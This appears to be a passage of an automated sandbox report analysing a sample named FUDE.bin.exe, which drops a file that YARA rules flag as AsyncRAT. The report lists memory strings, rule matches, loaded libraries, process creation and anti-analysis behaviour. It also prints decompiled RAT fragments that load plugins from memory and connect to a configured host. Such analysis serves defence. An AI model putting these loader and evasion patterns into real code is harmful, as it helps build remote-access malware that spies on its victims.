            Source: explorer.exe, 00000003.00000000.1694064441.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4144685534.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/news/us/a-nationwide-emergency-alert-will-be-sent-to-all-u-s-cellphones-we
            Source: explorer.exe, 00000003.00000000.1694064441.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4144685534.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/news/us/metro-officials-still-investigating-friday-s-railcar-derailment/ar
            Source: explorer.exe, 00000003.00000000.1694064441.00000000078AD000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/news/us/when-does-daylight-saving-time-end-2023-here-s-when-to-set-your-cl
            Source: explorer.exe, 00000003.00000000.1694064441.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4144685534.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/news/world/agostini-krausz-and-l-huillier-win-physics-nobel-for-looking-at
            Source: explorer.exe, 00000003.00000000.1694064441.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4144685534.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/weather/topstories/rest-of-hurricane-season-in-uncharted-waters-because-of
            Source: explorer.exe, 00000003.00000000.1694064441.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4144685534.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/weather/topstories/us-weather-super-el-nino-to-bring-more-flooding-and-win
            Source: explorer.exe, 00000003.00000000.1694064441.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4144685534.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com:443/en-us/feed
            Source: explorer.exe, 00000003.00000000.1694064441.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4144685534.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.rd.com/list/polite-habits-campers-dislike/
            Source: explorer.exe, 00000003.00000000.1694064441.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4144685534.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.rd.com/newsletter/?int_source=direct&int_medium=rd.com&int_campaign=nlrda_20221001_toppe

            System Summary

            barindex
            Source: 2.0.file.exe.c40000.0.unpack, type: UNPACKEDPEMatched rule: Detects AsyncRAT Author: ditekSHen
            Source: 00000002.00000000.1687708875.0000000000C42000.00000002.00000001.01000000.00000007.sdmp, type: MEMORYMatched rule: Detects AsyncRAT Author: ditekSHen
            Source: C:\Users\user\AppData\Local\Temp\file.exe, type: DROPPEDMatched rule: Detects AsyncRAT Author: ditekSHen
            Source: C:\Users\user\AppData\Local\Temp\file.exeProcess Stats: CPU usage > 49%
            Source: C:\Users\user\Desktop\FUDE.bin.exeCode function: 0_2_018E163A0_2_018E163A
            Source: C:\Users\user\AppData\Local\Temp\file.exeCode function: 2_2_00007FFD9B7D6D622_2_00007FFD9B7D6D62
            Source: C:\Users\user\AppData\Local\Temp\file.exeCode function: 2_2_00007FFD9B7D5FB62_2_00007FFD9B7D5FB6
            Source: C:\Users\user\AppData\Local\Temp\file.exeCode function: 2_2_00007FFD9B7D22E82_2_00007FFD9B7D22E8
            Source: C:\Users\user\AppData\Local\Temp\file.exeCode function: 2_2_00007FFD9B7D5AB92_2_00007FFD9B7D5AB9
            Source: FUDE.bin.exe, 00000000.00000002.1707448372.00000000033B5000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamexcweb.exe4 vs FUDE.bin.exe
            Source: FUDE.bin.exe, 00000000.00000002.1706185154.000000000139E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameclr.dllT vs FUDE.bin.exe
            Source: FUDE.bin.exe, 00000000.00000002.1706185154.000000000143C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamexcweb.W vs FUDE.bin.exe
            Source: FUDE.bin.exe, 00000000.00000000.1669700346.0000000000F92000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameFUDE.exe* vs FUDE.bin.exe
            Source: FUDE.bin.exe, 00000000.00000002.1707448372.00000000033A6000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamexcweb.exe4 vs FUDE.bin.exe
            Source: FUDE.bin.exeBinary or memory string: OriginalFilenameFUDE.exe* vs FUDE.bin.exe
            Source: 2.0.file.exe.c40000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
            Source: 00000002.00000000.1687708875.0000000000C42000.00000002.00000001.01000000.00000007.sdmp, type: MEMORYMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
            Source: C:\Users\user\AppData\Local\Temp\file.exe, type: DROPPEDMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
            Source: file.exe.0.dr, Helper.csCryptographic APIs: 'TransformFinalBlock'
            Source: file.exe.0.dr, Helper.csCryptographic APIs: 'TransformFinalBlock'
            Source: file.exe.0.dr, AlgorithmAES.csCryptographic APIs: 'TransformFinalBlock'
            Source: classification engineClassification label: mal100.troj.evad.winEXE@4/3@2/3
            Source: C:\Users\user\Desktop\FUDE.bin.exeFile created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\FUDE.bin.exe.logJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\file.exeMutant created: NULL
            Source: C:\Users\user\AppData\Local\Temp\file.exeMutant created: \Sessions\1\BaseNamedObjects\M2Ckx7VdqZvH412A
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4928:120:WilError_03
            Source: C:\Users\user\Desktop\FUDE.bin.exeFile created: C:\Users\user\AppData\Local\Temp\file.exeJump to behavior
            Source: FUDE.bin.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
            Source: FUDE.bin.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.83%
            Source: C:\Users\user\Desktop\FUDE.bin.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
            Source: C:\Users\user\Desktop\FUDE.bin.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
            Source: FUDE.bin.exeVirustotal: Detection: 17%
            Source: FUDE.bin.exeReversingLabs: Detection: 15%
            Source: unknownProcess created: C:\Users\user\Desktop\FUDE.bin.exe "C:\Users\user\Desktop\FUDE.bin.exe"
            Source: C:\Users\user\Desktop\FUDE.bin.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Users\user\Desktop\FUDE.bin.exeProcess created: C:\Users\user\AppData\Local\Temp\file.exe "C:\Users\user\AppData\Local\Temp\file.exe"
            Source: C:\Users\user\Desktop\FUDE.bin.exeProcess created: C:\Users\user\AppData\Local\Temp\file.exe "C:\Users\user\AppData\Local\Temp\file.exe" Jump to behavior
            Source: C:\Users\user\Desktop\FUDE.bin.exeSection loaded: mscoree.dllJump to behavior
            Source: C:\Users\user\Desktop\FUDE.bin.exeSection loaded: apphelp.dllJump to behavior
            Source: C:\Users\user\Desktop\FUDE.bin.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Users\user\Desktop\FUDE.bin.exeSection loaded: version.dllJump to behavior
            Source: C:\Users\user\Desktop\FUDE.bin.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
            Source: C:\Users\user\Desktop\FUDE.bin.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Users\user\Desktop\FUDE.bin.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Users\user\Desktop\FUDE.bin.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Users\user\Desktop\FUDE.bin.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Users\user\Desktop\FUDE.bin.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Users\user\Desktop\FUDE.bin.exeSection loaded: cryptsp.dllJump to behavior
            Source: C:\Users\user\Desktop\FUDE.bin.exeSection loaded: rsaenh.dllJump to behavior
            Source: C:\Users\user\Desktop\FUDE.bin.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Users\user\Desktop\FUDE.bin.exeSection loaded: rasapi32.dllJump to behavior
            Source: C:\Users\user\Desktop\FUDE.bin.exeSection loaded: rasman.dllJump to behavior
            Source: C:\Users\user\Desktop\FUDE.bin.exeSection loaded: rtutils.dllJump to behavior
            Source: C:\Users\user\Desktop\FUDE.bin.exeSection loaded: mswsock.dllJump to behavior
            Source: C:\Users\user\Desktop\FUDE.bin.exeSection loaded: winhttp.dllJump to behavior
            Source: C:\Users\user\Desktop\FUDE.bin.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
            Source: C:\Users\user\Desktop\FUDE.bin.exeSection loaded: iphlpapi.dllJump to behavior
            Source: C:\Users\user\Desktop\FUDE.bin.exeSection loaded: dhcpcsvc6.dllJump to behavior
            Source: C:\Users\user\Desktop\FUDE.bin.exeSection loaded: dhcpcsvc.dllJump to behavior
            Source: C:\Users\user\Desktop\FUDE.bin.exeSection loaded: dnsapi.dllJump to behavior
            Source: C:\Users\user\Desktop\FUDE.bin.exeSection loaded: winnsi.dllJump to behavior
            Source: C:\Users\user\Desktop\FUDE.bin.exeSection loaded: rasadhlp.dllJump to behavior
            Source: C:\Users\user\Desktop\FUDE.bin.exeSection loaded: fwpuclnt.dllJump to behavior
            Source: C:\Users\user\Desktop\FUDE.bin.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Users\user\Desktop\FUDE.bin.exeSection loaded: propsys.dllJump to behavior
            Source: C:\Users\user\Desktop\FUDE.bin.exeSection loaded: edputil.dllJump to behavior
            Source: C:\Users\user\Desktop\FUDE.bin.exeSection loaded: urlmon.dllJump to behavior
            Source: C:\Users\user\Desktop\FUDE.bin.exeSection loaded: iertutil.dllJump to behavior
            Source: C:\Users\user\Desktop\FUDE.bin.exeSection loaded: srvcli.dllJump to behavior
            Source: C:\Users\user\Desktop\FUDE.bin.exeSection loaded: netutils.dllJump to behavior
            Source: C:\Users\user\Desktop\FUDE.bin.exeSection loaded: windows.staterepositoryps.dllJump to behavior
            Source: C:\Users\user\Desktop\FUDE.bin.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Users\user\Desktop\FUDE.bin.exeSection loaded: wintypes.dllJump to behavior
            Source: C:\Users\user\Desktop\FUDE.bin.exeSection loaded: appresolver.dllJump to behavior
            Source: C:\Users\user\Desktop\FUDE.bin.exeSection loaded: bcp47langs.dllJump to behavior
            Source: C:\Users\user\Desktop\FUDE.bin.exeSection loaded: slc.dllJump to behavior
            Source: C:\Users\user\Desktop\FUDE.bin.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Users\user\Desktop\FUDE.bin.exeSection loaded: sppc.dllJump to behavior
            Source: C:\Users\user\Desktop\FUDE.bin.exeSection loaded: onecorecommonproxystub.dllJump to behavior
            Source: C:\Users\user\Desktop\FUDE.bin.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\file.exeSection loaded: mscoree.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\file.exeSection loaded: apphelp.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\file.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\file.exeSection loaded: version.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\file.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\file.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\file.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\file.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\file.exeSection loaded: cryptsp.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\file.exeSection loaded: rsaenh.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\file.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\file.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\file.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\file.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\file.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\file.exeSection loaded: mswsock.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\file.exeSection loaded: dnsapi.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\file.exeSection loaded: iphlpapi.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\file.exeSection loaded: rasadhlp.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\file.exeSection loaded: fwpuclnt.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\file.exeSection loaded: wbemcomn.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\file.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\file.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\file.exeSection loaded: avicap32.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\file.exeSection loaded: msvfw32.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\file.exeSection loaded: winmm.dllJump to behavior
            Source: C:\Windows\explorer.exeSection loaded: mfsrcsnk.dllJump to behavior
            Source: C:\Windows\explorer.exeSection loaded: windows.internal.shell.broker.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\file.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{CF4CC405-E2C5-4DDD-B3CE-5E7582D8C9FA}\InprocServer32Jump to behavior
            Source: FUDE.bin.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
            Source: FUDE.bin.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
            Source: FUDE.bin.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
            Source: Binary string: C:\Users\ADMIN\source\repos\FUDE\FUDE\obj\Release\FUDE.pdbS:m: _:_CorExeMainmscoree.dll source: FUDE.bin.exe
            Source: Binary string: C:\Users\ADMIN\source\repos\FUDE\FUDE\obj\Release\FUDE.pdb source: FUDE.bin.exe

            Data Obfuscation

            barindex
            Source: file.exe.0.dr, Messages.cs.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[5]{Settings.Host,Settings.Port,Settings.SPL,Settings.KEY,Helper.ID()}}, (string[])null, (Type[])null, (bool[])null, true)
            Source: file.exe.0.dr, Messages.cs.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[2]{Pack[2],Helper.Decompress(Convert.FromBase64String(Pack[3]))}}, (string[])null, (Type[])null, (bool[])null, true)
            Source: file.exe.0.dr, Messages.cs.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[1] { Pack[2] }}, (string[])null, (Type[])null, (bool[])null, true)
            Source: file.exe.0.dr, Messages.cs.Net Code: Plugin System.AppDomain.Load(byte[])
            Source: file.exe.0.dr, Messages.cs.Net Code: Memory System.AppDomain.Load(byte[])
            Source: file.exe.0.dr, Messages.cs.Net Code: Memory
            Source: FUDE.bin.exeStatic PE information: 0xFEBCA1D1 [Sat Jun 6 23:44:17 2105 UTC]
            Source: C:\Users\user\Desktop\FUDE.bin.exeFile created: C:\Users\user\AppData\Local\Temp\file.exeJump to dropped file
            Source: C:\Users\user\Desktop\FUDE.bin.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\FUDE.bin.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\FUDE.bin.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\FUDE.bin.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\FUDE.bin.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\FUDE.bin.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\FUDE.bin.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\FUDE.bin.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\FUDE.bin.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\FUDE.bin.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\FUDE.bin.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\FUDE.bin.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\FUDE.bin.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\FUDE.bin.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\FUDE.bin.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\FUDE.bin.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\FUDE.bin.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\FUDE.bin.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\FUDE.bin.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\FUDE.bin.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\FUDE.bin.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\FUDE.bin.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\FUDE.bin.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\FUDE.bin.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\FUDE.bin.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\FUDE.bin.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\FUDE.bin.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\FUDE.bin.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\FUDE.bin.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\FUDE.bin.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\FUDE.bin.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\FUDE.bin.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\FUDE.bin.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\FUDE.bin.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\FUDE.bin.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\FUDE.bin.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

            Malware Analysis System Evasion

            barindex
            Source: C:\Users\user\AppData\Local\Temp\file.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
            Source: C:\Users\user\Desktop\FUDE.bin.exeMemory allocated: 18E0000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\Desktop\FUDE.bin.exeMemory allocated: 3320000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\Desktop\FUDE.bin.exeMemory allocated: 3140000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\file.exeMemory allocated: 10A0000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\file.exeMemory allocated: 1AEC0000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\Desktop\FUDE.bin.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Users\user\AppData\Local\Temp\file.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Users\user\AppData\Local\Temp\file.exeWindow / User API: threadDelayed 9623Jump to behavior
            Source: C:\Windows\explorer.exeWindow / User API: foregroundWindowGot 883Jump to behavior
            Source: C:\Windows\explorer.exeWindow / User API: foregroundWindowGot 870Jump to behavior
            Source: C:\Users\user\Desktop\FUDE.bin.exe TID: 4908Thread sleep time: -922337203685477s >= -30000sJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\file.exe TID: 7276Thread sleep time: -2767011611056431s >= -30000sJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\file.exe TID: 7280Thread sleep count: 9623 > 30Jump to behavior
            Source: C:\Users\user\AppData\Local\Temp\file.exe TID: 7280Thread sleep count: 223 > 30Jump to behavior
            Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
            Source: C:\Users\user\AppData\Local\Temp\file.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\file.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
            Source: C:\Users\user\Desktop\FUDE.bin.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Users\user\AppData\Local\Temp\file.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: explorer.exe, 00000003.00000002.4148653749.00000000098A8000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: k&Ven_VMware&Prod_Virtual_disk\4&1656f219&0&000000
            Source: explorer.exe, 00000003.00000002.4147798516.0000000009815000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: NECVMWar VMware SATA CD00\w
            Source: explorer.exe, 00000003.00000002.4147798516.0000000009815000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#4&224f42ef&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}$
            Source: explorer.exe, 00000003.00000002.4148653749.00000000098A8000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\4&1656f219&0&000000
            Source: FUDE.bin.exe, 00000000.00000002.1706185154.00000000013E9000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\y
            Source: explorer.exe, 00000003.00000002.4141791366.0000000001240000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&0000000}
            Source: FUDE.bin.exe, 00000000.00000002.1706185154.00000000013E9000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
            Source: explorer.exe, 00000003.00000000.1698574900.000000000C964000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000C5E500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
